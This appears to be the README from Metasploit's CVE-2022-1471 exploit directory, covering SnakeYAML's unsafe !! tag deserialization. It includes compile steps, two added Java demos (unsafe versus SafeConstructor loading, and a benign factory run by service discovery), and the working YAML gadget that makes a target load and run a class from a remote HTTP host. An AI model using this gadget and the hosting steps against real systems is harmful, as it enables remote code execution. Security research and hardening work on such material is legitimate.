metasploit-framework/external/source/exploits/CVE-2022-1471
Last commit: Spencer McIntyre, 86b7ec4518, "Address comments from the review", 2023-10-12 09:50:19 -04:00
Files: MyScriptEngineFactory.java, README.md

README.md

Overview

The Java file contained within will load and execute a Metasploit payload. It is intended to be loaded as part of the exploit for CVE-2022-1471, a YAML deserialization vulnerability in the snakeyaml project: SnakeYAML's default Constructor (versions before 2.0) instantiates any class named by a global !! tag, so an attacker who controls a YAML document parsed with it can construct arbitrary objects on the classpath.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
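The following is an added example, not code from the Metasploit module or from SnakeYAML, showing the vulnerable pattern next to its hardened form. The class name SnakeYamlTagDemo is made up; it compiles against SnakeYAML 1.33 or 2.x (javac -cp snakeyaml-<version>.jar SnakeYamlTagDemo.java). The unsafe path is only exercised against a harmless tag (java.net.URL, whose constructor parses but never connects) so nothing reaches the RFC 5737 placeholder address:

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Added demonstration class (hypothetical, not part of the Metasploit module):
// the default SnakeYAML 1.x Constructor, which honours global (!!) tags, beside SafeConstructor.
public class SnakeYamlTagDemo {

    // The gadget from this README, verbatim. Never executed through the unsafe loader here.
    static final String GADGET =
        "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
      + "[[!!java.net.URL [\"http://192.0.2.1:8080/\"]]]]";

    // A tag naming a harmless class: enough to show that !! selects arbitrary classes.
    static final String HARMLESS_TAG = "!!java.net.URL [\"http://192.0.2.1:8080/\"]";

    // Vulnerable pattern (SnakeYAML < 2.0): new Yaml() wraps the default Constructor, which
    // resolves a !!fully.qualified.Name tag to a class and calls a public constructor whose
    // arity matches the sequence items. SnakeYAML 2.x denies global tags here by default.
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened pattern: SafeConstructor only knows the standard YAML types (str, int, map,
    // seq, ...). Any global tag is rejected before a class name is even looked up.
    static Object loadSafe(String doc) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(doc);
    }

    public static void main(String[] args) {
        try {
            Object built = loadUnsafe(HARMLESS_TAG);
            System.out.println("default Constructor built: " + built.getClass().getName());
        } catch (YAMLException e) {
            System.out.println("default Constructor rejected it (SnakeYAML 2.x): " + e.getMessage());
        }

        for (String doc : new String[] {HARMLESS_TAG, GADGET}) {
            try {
                loadSafe(doc);
                System.out.println("unexpected: SafeConstructor accepted the document");
            } catch (YAMLException e) {
                System.out.println("SafeConstructor rejected it: " + e.getMessage());
            }
        }
    }
}
```

On SnakeYAML 1.x the first call produces a java.net.URL object, which is the same mechanism that turns the full gadget into a ScriptEngineManager backed by a remote URLClassLoader; both SafeConstructor calls throw a ConstructorException for the unknown tag. Applications that genuinely need typed documents should whitelist the expected classes (SnakeYAML 2.x does this through LoaderOptions' TagInspector) rather than fall back to the default Constructor.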

Compiling

It is necessary to specify the Metasploit Payloads data directory as the class path when compiling, since the source builds on the Metasploit Java payload classes. See the metasploit-payloads repository for instructions on how to compile the main Java payloads and install the data files.

Compile the Java source file with javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java. The resulting MyScriptEngineFactory.class is the file to host.

Usage

Trigger the deserialization by having the vulnerable application load the following YAML (192.0.2.1:8080 is a placeholder; replace it with the host and port of the HTTP server, which the target must be able to reach over outbound HTTP):

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]

Host the compiled class on an HTTP server at the root named in the URL (the URLClassLoader will request /MyScriptEngineFactory.class), along with the file /META-INF/services/javax.script.ScriptEngineFactory. The contents of this file should simply be the class name to load (MyScriptEngineFactory). The ScriptEngineManager constructor discovers factories through java.util.ServiceLoader using the supplied class loader and instantiates each one it finds, which is what causes the hosted class to execute. See Metasploit's Msf::Exploit::Remote::Java::HTTP::ClassLoader mixin for more information and the remaining components necessary to deliver a Metasploit payload.
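The following added example (hypothetical, not Metasploit's MyScriptEngineFactory) is a benign stand-in that demonstrates the discovery step above end to end: it writes the same two artefacts the README tells you to host into a temporary directory, then constructs a ScriptEngineManager over a URLClassLoader pointed at that directory by a file: URL, exactly the object graph the YAML gadget builds. The class name DemoScriptEngineFactory and the temp-directory layout are assumptions for the demo; the point is that the constructor body runs during discovery, with no call to getScriptEngine() or any other method:

```java
import java.io.IOException;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Collections;
import java.util.List;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import javax.script.ScriptEngineManager;

// Added, benign stand-in for the hosted class (not Metasploit's MyScriptEngineFactory).
// It only proves that whatever sits in the constructor runs as soon as ScriptEngineManager
// discovers the class through META-INF/services.
public class DemoScriptEngineFactory implements ScriptEngineFactory {

    public DemoScriptEngineFactory() {
        // In the real exploit this is where the payload would be started. Here: a marker.
        System.out.println("DemoScriptEngineFactory constructed during service discovery");
    }

    // ServiceLoader checks that the provider implements the service interface before
    // instantiating it, so the interface must be satisfied. None of these methods is
    // called during discovery.
    public String getEngineName()       { return "demo"; }
    public String getEngineVersion()    { return "0"; }
    public List<String> getExtensions() { return Collections.emptyList(); }
    public List<String> getMimeTypes()  { return Collections.emptyList(); }
    public List<String> getNames()      { return Collections.emptyList(); }
    public String getLanguageName()     { return "demo"; }
    public String getLanguageVersion()  { return "0"; }
    public Object getParameter(String key) { return null; }
    public String getMethodCallSyntax(String obj, String m, String... args) { return null; }
    public String getOutputStatement(String toDisplay) { return null; }
    public String getProgram(String... statements) { return null; }
    public ScriptEngine getScriptEngine() { return null; }

    public static void main(String[] args) throws IOException {
        // Lay out <root>/META-INF/services/javax.script.ScriptEngineFactory, one class
        // name per line, exactly like the file the HTTP server serves in the real attack.
        Path root = Files.createTempDirectory("cve-2022-1471-demo");
        Path services = root.resolve("META-INF").resolve("services");
        Files.createDirectories(services);
        Files.write(services.resolve("javax.script.ScriptEngineFactory"),
                Collections.singletonList(DemoScriptEngineFactory.class.getName()));

        // Path.toUri() on a directory ends in "/", which URLClassLoader treats as a
        // directory root; this stands in for http://192.0.2.1:8080/ in the gadget.
        URL base = root.toUri().toURL();
        System.out.println("service root: " + base);

        // Same constructor chain the YAML produces. Enumerating the services file through
        // the URLClassLoader, resolving the class and instantiating it all happen inside
        // this call; the marker line from the constructor appears before the next print.
        new ScriptEngineManager(new URLClassLoader(new URL[] {base}));
        System.out.println("ScriptEngineManager initialised");
    }
}
```

Here the class itself is resolved through the URLClassLoader's parent because it is already on the application classpath; in the real attack the loader has to fetch /MyScriptEngineFactory.class from the HTTP server as well, which is why both files must be hosted and why a target without outbound HTTP access never reaches the constructor.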